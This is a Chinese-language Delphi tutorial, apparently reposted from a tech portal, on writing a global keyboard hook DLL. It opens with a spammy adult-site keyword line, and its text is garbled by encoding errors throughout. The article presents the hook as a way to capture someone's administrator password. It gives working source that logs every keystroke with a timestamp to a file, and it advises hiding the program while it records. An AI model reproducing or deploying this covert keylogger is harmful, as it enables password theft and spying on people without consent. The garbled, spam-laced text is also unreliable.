自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Delphi編程使用HOOK監(jiān)視Windows

開(kāi)發(fā) 開(kāi)發(fā)工具
本文是筆者在Delphi學(xué)習(xí)過(guò)程中,得出的個(gè)人體會(huì),介紹了通過(guò)Delphi編程使用HOOK監(jiān)視Windows的具體方法,希望能與大家共同分享一下。

  文中詳細(xì)介紹了如何通過(guò)Delphi編程使用HOOK監(jiān)視Windows的步驟,同時(shí)給出了程序?qū)嵗?/P>

  每個(gè)程序都有自己的生存空間,在Windows系統(tǒng)中你可以在任何時(shí)候讓你的程序執(zhí)行一些操作,還可以觸發(fā)消息,觸發(fā)的消息分為三種,一是操作你程序的界面,onClick,onMouseMove等等,另外一個(gè)可以使用Windows的消息機(jī)制來(lái)捕獲一些系統(tǒng)消息,但是如果你想在任何時(shí)候監(jiān)控任何程序的情況那可能你就會(huì)選擇HOOK來(lái)實(shí)現(xiàn)了,雖然還有其他方法,但不得不承認(rèn),HOOK是一個(gè)比較簡(jiǎn)單解決問(wèn)題的途徑。

  下面就來(lái)舉個(gè)例子:

  如果你需要訪問(wèn)某個(gè)人的機(jī)器,那在運(yùn)行\(zhòng)\SB之后那個(gè)人就會(huì)在你機(jī)器上敲入他的adminsitrator密碼,當(dāng)然,你也可以使用黑客工具來(lái)得到他的密碼,但是,為什么不自己嘗試一下寫個(gè)程序記錄所有的鍵盤操作呢?

  首先需要申明一點(diǎn),Hook不同于一般的應(yīng)用程序,需要作為一個(gè)全局DLL出現(xiàn),否則無(wú)法在你程序不激活的狀態(tài)捕獲其他信息的,(當(dāng)然你可以用Windows消息,這個(gè)問(wèn)題不在這里討論)。

  寫個(gè)DLL定義一下函數(shù)

  1. function setkeyhook:bool;export;  
  2. function endkeyhook:bool;export;  
  3. procedure keyhookexit;far;  
  4. procedure SetMainHandle(Handle: HWND); export;forward;  
  5. function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;  
  6.  
  7. procedure EntryPointProc(Reason: Integer);  
  8.  const 
  9.   hMapObject: THandle = 0;  
  10.  begin  
  11.   case reason of  
  12.    DLL_PROCESS_ATTACH:  
  13.   begin  
  14.    hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);  
  15.    rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);  
  16.   end;  
  17.   DLL_PROCESS_DETACH:  
  18.  begin  
  19.  try 
  20.   UnMapViewOfFile(rHookRec);  
  21.   CloseHandle(hMapObject);  
  22.   except  
  23.  end;  
  24. end;  
  25. end;  
  26. end;  
  27. procedure keyhookexit;far;  
  28. begin  
  29. if hNexthookproc<>0 then endkeyhook;  
  30.  exitproc:=procsaveexit;  
  31. end;  
  32. function endkeyhook:bool;export;  
  33. begin  
  34. if hNexthookproc<>0 then  
  35. begin  
  36.  unhookwindowshookex(hNexthookproc);  
  37.  hNexthookproc:=0;  
  38.  messagebeep(0);  
  39. end;  
  40. result:=hNexthookproc=0;  
  41. MainHandle:=0;  
  42. end;  
  43.  
  44. function Setkeyhook:bool;export;  
  45. begin  
  46.  hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);  
  47.  result:=hNexthookproc<>0;  
  48. end;  
  49. function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;  
  50. var  
  51.  s:Tstringlist;  
  52. begin  
  53.  if icode<0 then  
  54.  begin  
  55.   result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);  
  56.   exit;  
  57.  end;  
  58.  if lparam<0 then  
  59.  begin  
  60.   exit;  
  61.  end;  
  62.  s:=TStringlist.Create;  
  63.  if FileExists(afilename) then  
  64.   s.LoadFromFile(afilename);  
  65.  
  66.   //將敲打的鍵盤字符保存到文件中   
  67.   s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) + char(wParam) );  
  68.   s.SaveToFile(afilename);  
  69.   s.Free;  
  70.  
  71.   result:=0;  
  72.  end;  

  Dll的Project文件中定義如下

  1. exports  
  2. setkeyhook index 1,  
  3. endkeyhook index 2,  
  4. SetMainHandle index 3;  
  5.  
  6. begin   
  7. hNexthookproc:=0;  
  8. procsaveexit:=exitproc;  
  9. DllProc := @EntryPointProc;  
  10. EntryPointProc(DLL_PROCESS_ATTACH);  
  11. end;

  這樣DLL就定義好了,接下來(lái)就是畫個(gè)界面:

  1. function setkeyhook:bool;external ’keyspy.dll’;  
  2. function endkeyhook:bool;external ’keyspy.dll’;  
  3. procedure SetMainHandle(Handle: HWND); external ’keyspy.dll’;  
  4. //開(kāi)始捕獲鍵盤  
  5. SetMainHandle(handle);  
  6. setkeyhook  
  7. //中止捕獲鍵盤  
  8. endkeyhook    

  然后吧你程序隱蔽起來(lái),啟動(dòng)捕獲鍵盤,在中止捕獲之前,所有鍵盤操作都會(huì)被記錄到你所定義的filename這個(gè)文件名中去,注:這些代碼是臨時(shí)寫的,僅是為了說(shuō)明如何寫個(gè)hook程序。

  另外Hook的功能不僅僅是簡(jiǎn)單使用,這就需要靠大家靈活運(yùn)用了,可以跟很多windows API來(lái)配合,通過(guò)很多技巧作出讓人意想不到的效果。

【編輯推薦】

  1. Delphi基礎(chǔ)開(kāi)發(fā)技巧
  2. Delphi編程讀取txt文件數(shù)據(jù)
  3. 如何在Delphi中自動(dòng)錄入數(shù)據(jù)
  4. 基于Delphi的屏幕抓圖技術(shù)的實(shí)現(xiàn)
  5. Delphi初學(xué)者應(yīng)小心的六大問(wèn)題
  6. 淺析Delphi XE中的動(dòng)態(tài)Hook某些內(nèi)部事件
責(zé)任編輯:韓亞珊 來(lái)源: 編程愛(ài)好者
相關(guān)推薦

2010-12-16 11:10:29

Windows Ser

2011-01-05 09:14:38

Delphi XE

2011-11-08 21:54:05

Windows 監(jiān)控

2011-04-06 08:54:25

Nagios監(jiān)視

2012-03-19 10:46:53

ibmdw

2009-10-26 09:49:26

監(jiān)視器監(jiān)視網(wǎng)絡(luò)通信

2010-05-31 19:35:23

Ubuntu mrtg

2010-01-25 13:31:27

C++程序

2011-04-06 13:56:36

Delphi

2024-07-16 09:51:39

HTMLHookReact

2018-12-05 10:10:23

Windows 10設(shè)置監(jiān)視器

2025-02-12 00:21:44

Java并發(fā)編程

2009-08-14 11:15:19

文件監(jiān)視C#Windows服務(wù)

2011-04-06 16:07:44

Delphi

2017-11-01 07:57:08

Python

2014-10-13 10:15:13

Android HOOCydia Subst

2010-07-07 13:39:33

SQL Server監(jiān)

2015-09-07 09:41:42

tshark網(wǎng)絡(luò)流量

2012-02-03 09:55:06

Delphi

2009-05-12 09:04:41

微軟Windows 7操作系統(tǒng)
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)